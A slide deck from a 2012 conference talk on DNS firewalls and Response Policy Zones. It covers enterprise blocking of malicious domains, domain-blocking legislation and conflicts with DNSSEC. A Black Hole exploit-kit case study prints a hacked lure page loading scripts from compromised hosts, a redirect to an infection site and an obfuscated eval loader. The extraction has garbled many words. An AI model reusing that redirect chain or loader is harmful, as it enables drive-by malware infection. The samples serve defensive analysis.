Using the DNS as a Hammer The Good, the Bad and the Ugly

Similar documents
DNS Firewalls with BIND: ISC RPZ and the IID Approach. Tuesday, 26 June 2012

FAQ (Frequently Asked Questions)

DNS RPZ in the Swiss NREN

CYBERSECURITY INESTIGATION AND ANALYSIS

WHITEPAPER. How a DNS Firewall Helps in the Battle against Advanced Persistent Threat and Similar Malware

WE KNOW IT BEFORE YOU DO: PREDICTING MALICIOUS DOMAINS Wei Xu, Kyle Sanders & Yanxin Zhang Palo Alto Networks, Inc., USA

We Know It Before You Do: Predicting Malicious Domains

Configuring a Domain to work with your Server

Response Policy Zones

Malware & Botnets. Botnets

Practical Usage of Passive DNS Monitoring for E-Crime Investigations

LASTLINE WHITEPAPER. Using Passive DNS Analysis to Automatically Detect Malicious Domains

Defend Your Network with DNS Defeat Malware and Botnet Infections with a DNS Firewall

Defend Your Network with DNS Defeat Malware and Botnet Infections with a DNS Firewall

Exploring the Black Hole Exploit Kit

DNS Traffic Monitoring. Dave Piscitello VP Security and ICT Coordina;on, ICANN

CENSURFRIDNS a.k.a. UNCENSOREDDNS. Thomas Steen Rasmussen

How To Filter From A Spam Filter

Acceptable Use Policy and Terms of Service

Doris Yang Vectra Networks, Inc. June 16, 2015 The World Ahead

Security Incidents And Trends In Croatia. Domagoj Klasić

Surveying the DNS Threat Landscape by Rod Rasmussen and Paul Vixie

Defending your DNS in a post-kaminsky world. Paul Wouters <paul@xelerance.com>

Measures to Protect (University) Domain Registrations and DNS Against Attacks. Dave Piscitello, ICANN

WEB ATTACKS AND COUNTERMEASURES

Software that provides secure access to technology, everywhere.

Anti-Phishing Best Practices for ISPs and Mailbox Providers

N-CAP Users Guide Everything You Need to Know About Using the Internet! How Firewalls Work

Spear Phishing Attacks Why They are Successful and How to Stop Them

5 DNS Security Risks That Keep You Up At Night (And How To Get Back To Sleep)

Securing Your Business s Bank Account

Using big data analytics to identify malicious content: a case study on spam s

GlobalSign Malware Monitoring

Securing Cloud-Based

DNS Response Policy Zone (DNSRPZ)

Lesson 13: DNS Security. Javier Osuna GMV Head of Security and Process Consulting Division

Cybersecurity: An Innovative Approach to Advanced Persistent Threats

SECURITY REIMAGINED SPEAR PHISHING ATTACKS WHY THEY ARE SUCCESSFUL AND HOW TO STOP THEM. Why Automated Analysis Tools are not Created Equal

Zscaler Internet Security Frequently Asked Questions

ZNetLive Malware Monitoring

Transferring Hosting to Fasthosts

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?

Domain Name Abuse Detection. Liming Wang

QUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY

Architecture. The DMZ is a portion of a network that separates a purely internal network from an external network.

FSOEP Web Banking & Fraud: Corporate Treasury Attacks

Hosting more than one FortiOS instance on. VLANs. 1. Network topology

Description: Objective: Attending students will learn:

How Attackers are Targeting Your Mobile Devices. Wade Williamson

Phishing Activity Trends Report for the Month of December, 2007

IT TRENDS AND FUTURE CONSIDERATIONS. Paul Rainbow CPA, CISA, CIA, CISSP, CTGA

SAC 025 SSAC Advisory on Fast Flux Hosting and DNS

INCREASINGLY, ORGANIZATIONS ARE ASKING WHAT CAN T GO TO THE CLOUD, RATHER THAN WHAT CAN. Albin Penič Technical Team Leader Eastern Europe

VIDEO Intypedia013en LESSON 13: DNS SECURITY. AUTHOR: Javier Osuna García-Malo de Molina. GMV Head of Security and Process Consulting Division

DNS. The Root Name Servers. DNS Hierarchy. Computer System Security and Management SMD139. Root name server. .se name server. .

Phishing by data URI

HACKER INTELLIGENCE INITIATIVE. The Secret Behind CryptoWall s Success

Internet Security and Resiliency: A Collaborative Effort

A host-based firewall can be used in addition to a network-based firewall to provide multiple layers of protection.

Transferring Your Internet Services

Detect Malware and APTs with DNS Firewall Virtual Evaluation

DOMAIN AND GLOSSARY The phrases and terms you may encounter, when registering a domain name

Infoblox Inc. All Rights Reserved. Talks about DNS: architectures & security

Whose IP Is It Anyways: Tales of IP Reputation Failures

Unknown threats in Sweden. Study publication August 27, 2014

Why Device Fingerprinting Provides Better Network Security than IP Blocking. How to transform the economics of hacking in your favor

Libra Esva. Whitepaper. Glossary. How Really Works. Security Virtual Appliance. May, It's So Simple...or Is It?

UNCLASSIFIED. General Enquiries. Incidents Incidents

ACCEPTABLE USE AND TAKEDOWN POLICY

Security+ Guide to Network Security Fundamentals, Fourth Edition. Chapter 6 Network Security

How to Add Domains and DNS Records

Protecting Your Organisation from Targeted Cyber Intrusion

Decoding DNS data. Using DNS traffic analysis to identify cyber security threats, server misconfigurations and software bugs

DATA SHEET. What Darktrace Finds

ARP and DNS. ARP entries are cached by network devices to save time, these cached entries make up a table

Resilient Botnet Command and Control with Tor

INFORMATION SECURITY REVIEW

Methods for Sharing Dynamic IP Address Space Information with Others

ANDRA ZAHARIA MARCOM MANAGER

Setting Up Scan to SMB on TaskALFA series MFP s.

Transcription:

Using the DNS as a Hammer The Good, the Bad and the Ugly SATIN March 22, 2012

March 22, 2012, SATIN Conference

March 22, 2012, SATIN Conference

Presenter: Rod Rasmussen Rod.Rasmussen<at>InternetIdenBty.com President & CTO Internet IdenBty Co- Chair APWG Internet Policy CommiOee Recently joined SSAC AcBve member FIRST, MAAWG, DNS- OARC, Digital Phish- Net, RISG, OTA FCC CSRIC

State of Play Malicious domains/hosts created regularly Heavy abuse conbnues usually registrar specific malware the driver today Enterprises aoacked stealthily via hostnames (Aurora, Night Dragon, Shady RAT) Governments have discovered the DNS RIAA, MPAA, trademark/ip holders have discovered the DNS

Nails Malware C&C s Phishing domains Mule sites Counterfeit Goods Piracy Trademark infringement AnB- government sites Dissidents

The Hammer Recursive DNS servers Blocking domains/hostnames Filtering/redirecBng domains/hostnames DiOo with IP addresses via reverse resolubon Specialized nameserver so_ware or add- ons BIND RPZ s Think of this as a DNS Firewall

How to use the Hammer Simple really: pre- load the cache with the responses you want to give and keep them there Done regularly for various roubng/internal uses Many ways to get entries in there Can synthesize values or NX a responses Also seen some nasty CNAME stuff Get lists of hostnames to block from somewhere RPZs make this trivial, secure, and very scalable

RPZ Response Policy Zones Most new domain names are malicious. I am stunned by the simplicity and truth of that observabon. Every day lots of new names are added to the global DNS, and most of them belong to scammers, spammers, e- criminals, and speculators. Domains are cheap, domains are plenbful, and as a result most of them are dreck or worse. Paul Vixie "Taking Back the DNS July 30, 2010 hop://www.circleid.com/posts/20100728_taking_back_the_dns/ RPZ (Response Policy Zones) the result Any BIND resolver can easily implement large- scale domain block lists Scalable: Several lists, different policies per list Fast: AutomaBcally updated with real- Bme data

PerspecBve is Key ProtecBng what? Enterprise network CriBcal infrastructure ISP customer base ProtecBng for whom? Your own network/employees Customers Government IP holders

What is the User IncenBve? Work for a company with sensibve data Don t want to lose their own PII Don t want to have computer infected Keep kids away from certain content Don t want to overpay for music/movies Want to buy stuff that s not quite legal (gray) Want to speak out against the government Want to start a revolubon

User and Network Operator Goals Must be aligned Alignment = use of filtering/blocking Non- alignment leads to user non- acceptance AlternaBve DNS solubons available AlternaBves to DNS itself available Users will forego protecbon against some threats (malware) to achieve their own goals (cheap music)

Worst- case Scenarios Rampant use of alternate, unsafe DNS servers Rise of shady so_ware that allows circumvenbon potenbally opening up new exploits Split root

The Good There would be a really cool picture of Clint Eastwood here from the movie, but I didn t want to get sued by MGM

Enterprises and Government Users Constant assault these days 2011 year of the data breach Spear phishing, malware via e- mail/social engineering Hacking and silent extracbon of data (aka APT) Criminal and nabon state actors Most aoacks leverage hostnames ExfiltraBon via vicbm.badguydomain.tld DUH! Plenty of data available, but not implemented at the perimeter Time to install a DNS Firewall

Very Tight ProtecBon Possible Enterprises have alignment with users Can dictate port 53 policy all users must use DNS Firewall recursive servers Via VPN for remote users Many solubons and list sources available Can use DNS resolubon logging to detect anomalies Previously unknown malware/data exfiltrabon DNS tunneling and malware C&C via the DNS

The Bad There would be a really cool picture of Lee Van Cleef here from the movie, but I didn t want to get sued by MGM

SOPA/PIPA and Other US LegislaBon High profile legislabon in US that would require ISPs to block domains at resolvers due to lack of acbon by other countries Agree with it or not, lack of process and/or response to long- standing issues has allowed advocates to pursue this avenue Supported by IP holders with strong backing Off the table for now, but certainly not dead

Worldwide Regulatory Impacts Similar effect legislabon being adopted/discussed throughout Europe Italy - > led to large- scale adopbon of alternate DNS France - > varied approach/results ACTA (not truly equivalent, but Anon thinks so ) Popping up around the world Some countries run nabonal firewalls and filtering and have for years Real implicabons for all recursive DNS operators

Why this doesn t work Users want the blocked content AlternaBve methods exist to get it IP address based resources you do remember that DNS just maps names to IPs right? AlternaBve DNS servers abound ISPs cannot force port 53 (anb- compebbve) DNS can use other ports, proxies Proxy servers for web and other content Breaks DNSSEC (well it will at some point)

The Ugly There would be a really cool picture of Eli Wallach here from the movie, but I didn t want to get sued by MGM

DNSSEC May Will Break Currently not an issue with recursive server level validabon Will be a major problem with endpoint validabon DNS Firewall responses are lies and DNSSEC doesn t like being lied to Will find alternabve validabon method and sbll get to the bad hostname This needs to be fixed for compabbility

The Other

Complex aoacks using evil domains The game is changing significantly Redirects for drive- by- downloads ObfuscaBon and hiding techniques ACL s to prevent responders from seeing issues Malware rendezvous and C&C hidden in code Abuse of whois privacy to shield criminal registrabons (ICANN studies underway) Criminals use of automated domain registrabon processes built into the malware control panel DGA for automated botnet reconnecbons

Sample: Black Hole Exploit Site Massive phishy spam campaigns Lures lead to compromised sites Redirect to other sites Eventual landing page uses tricks to exploit browser bugs and infect machine RedirecBon is obfuscated hard to know what domains are involved.

Lure e- mail Obfuscated URL: hxxp://stonehengeroofingproducts.com/emngorgc/index.html DO NOT GO TO THAT SITE WITH A WINDOWS MACHINE!!!!

What you get

First Lure Site Hacked server needs fixing Redirects to further hacked servers Modified to prevent infecbon! <html> <h1>wait PLEASE</h1> <h3>loading...</h3> <script type="text/javascript" src= hxxp://skodamene.no/clftseyg/js.js"></script> <script type="text/javascript" src= hxxp://bendabebemimos.com/jhgfzcjv/js.js"></script> <script type="text/javascript" src= hxxp://produccionesqueens.com/acfv9bml/js.js"></script> <script type="text/javascript" src= hxxp://purchasemiraclemineral.info/yxcrbqxk/js.js"></script> <script type="text/javascript" src= hxxp://successwithso_ware.com/49qkhzro/js.js"></script> <script type="text/javascript" src= hxxp://thefocuspointphotography.com/jnzxp3ea/js.js"></script> </html>

Intermediate Site hxxp://skodamene.no/clftseyg/js.js Another hacked site that needs cleanup Contents simply redirect elsewhere document.locabon= hxxp://hakkaboat.com/search.php?page=73a07bcb51f4be71';

Actual InfecBon Site hxxp://hakkaboat.com/search.php? Domain is owned by criminal Go there directly and you end up at Google Exploits various browser flaws Eventually downloads Zeus That version of Zeus controlled by several criminally controlled domains that need to be suspended as well

Obfuscated Code on Exploit Site <html><body><script> if(window.document) a=([].unshi_+16).substr(1,3); aa=([].unshi_+ [].unshi_).substr(1,3); if(a===aa) f={q: ["59'70'58'76'68'60'69'75'5'78'73'64'75'60'- 1'- 2'19'58'60'69'75'60'73'21'19'63'8'21'39'67'6 0'56'74'60'- 9'78'56'64'75'- 9'71'56'62'60'- 9'64'74'- 9'67'70'56'59'64'69'62'5'5'5'19'6'63'8'21' 19'6'58'60'69'75'60'73'21'19'63'73'21'- 2'0'18'61'76'69'58'75'64'70'69'- 9'60'69'59'54'73'60' 59'64'73'60'58'75'- 1'0'82'78'64'69'59'70'78'5'67'70'58'56'75'64'70'69'5'63'73'60'61'20'- Deleted 1000s of lines of code '- 1'60'69'59'54'73'60'59'64'73'60'58'75'3'15'7'7'7'0'18'84'74'71'67'7'- 1'0'18"][0]}.q.split ("'"); md='a'; e=eval; w=f; s=''; f='f'; st=e("s".concat("tri","ng")); for(i=0;i<w.length;i++) { z=w[i]; s=s.concat(st[f+'romcharcod'+'e'](41+parseint(z))); } q={run:{run:funcbon(w){e (w)}}}; q['run']['ru'+'n'](s); </script></body></html> Ge ng these shut down is HARD!

DNS Firewalls Easily Block These Can implement a block/redirect as soon as new exploit site idenbfied Users clicking on e- mails will never get to eventual drop site Many techniques ID bad domains prior to use Passive DNS Nameserver monitoring RegistraBon data for new domains

A Recent QuesBon on.su High levels of abuse on a TLD lead to potenbal full block by major organizabon Answer was, yeah, probably worth it Abuse.ch recommends blocking the enbre.su TLD: hop://www.abuse.ch/?p=3581

Wrap- up We have a variety of issues that appear to some to all be nails DNS provides an effecbve hammer If your goals are aligned (enterprise, anb- malware) Will smash your thumb if users don t want to be redirected or blocked Issues with DNSSEC need to be addressed long- term We will see a lot of this Bme to get it right is now!

Thank You! Now for your quesbons

Using the DNS as a Hammer The Good, the Bad and the Ugly SATIN March 22, 2012

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information